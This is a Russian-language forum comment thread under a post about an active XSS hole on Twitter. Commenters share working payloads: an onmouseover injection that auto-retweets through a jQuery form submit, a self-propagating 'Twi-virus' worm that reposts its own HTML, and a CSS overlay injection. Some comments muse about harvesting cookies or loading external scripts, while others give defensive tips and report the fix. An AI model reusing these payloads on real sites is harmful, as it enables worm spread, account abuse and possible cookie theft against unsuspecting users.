Комментарии 105
Молодец!
Фильтруйте все данные приходящие от пользователя!!!
Фильтруйте все данные приходящие от пользователя!!!
+2
В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
+1
Мне вот такую штуку послали (пробел после http надо убрать):
http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
0
Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)
Кстати, так можно спастить от бага до офф. фикса
Кстати, так можно спастить от бага до офф. фикса
+1
Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
+3
А у кого?
+1
А как вообще узнать, есть у меня эта возможность, или нет?
0
+7
Может, если подделать кнопочку у себя, она и у других включится?
+1
Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
Попробуйте, вдруг получится.
Попробуйте, вдруг получится.
0
Понятно, спасибо!
0
хреноватенькие тестеры у них
+7
А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
+1
Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
0
Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
0
twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
+3
А теперь то же самое с хеш-тегом, например #prinsjesdag
+1
с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
Можете попробовать, если че:
Можете попробовать, если че:
twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
0
Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
0
Переходим на CSS3 ;-)
+12
Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
+17
возвращаемся к временам ASM, приложение в минимальном количестве символов )
0
Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
0
Noscript как бе говорит «пофигу» ))
0
НЛО прилетело и опубликовало эту надпись здесь
всё, черви пошли. не ходите на вебморду
+2
Twi-вирус:
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
+6
Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
Наводишь мышку и автоматом ретвитишь.
Наводишь мышку и автоматом ретвитишь.
+1
А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
0
Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
+1
НЛО прилетело и опубликовало эту надпись здесь
А какой командой удаляются аккаунты? :)
-1
Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
0
Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
+1
В ленте пипец просто настал.
Спас Firebug…
Спас Firebug…
+1
Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:
А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
-5
крупная компания грешит ламерством
+6
Дуров, кто-же еще =)
0
Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
+9
так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
+3
Хотите сказать, что Вконтакте преднамеренно это сделала?
0
Попался два раза на авторетвите. Firebug помог.
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
0
«В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
Твиттер без скрипта не работает.
Твиттер без скрипта не работает.
0
В целях безопасности сейчас лучше всего использовать внешние клиенты.
0
Вся лента теперь в этих отправлениях.
0
НЛО прилетело и опубликовало эту надпись здесь
Всё, уже вылечили.
Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
0
<script language="javascript">
document.write('http:\u002f\u002fis.gd\u002ffl5d3')
</script>
0
уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
-4
Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
+3
+1
Ты украл мой код! twitter.com/myfreeweb/statuses/25112218506 см. время
+2
Ну вот и пофиксили
0
Ждём, когда @KremlinRussia ретвитнет радугу :)
+5
НЛО прилетело и опубликовало эту надпись здесь
Почему до сих пор нет Властелина?
+6
@ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
0
Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
+1
Я просто оставлю это здесь:
mobile.twitter.com/
mobile.twitter.com/
+1
Я горжусь, что меня фолловит @mr_the :D
+1
Пофиксили. Расходимся (:
+2
кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
-7
+1
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Активная XSS на Twitter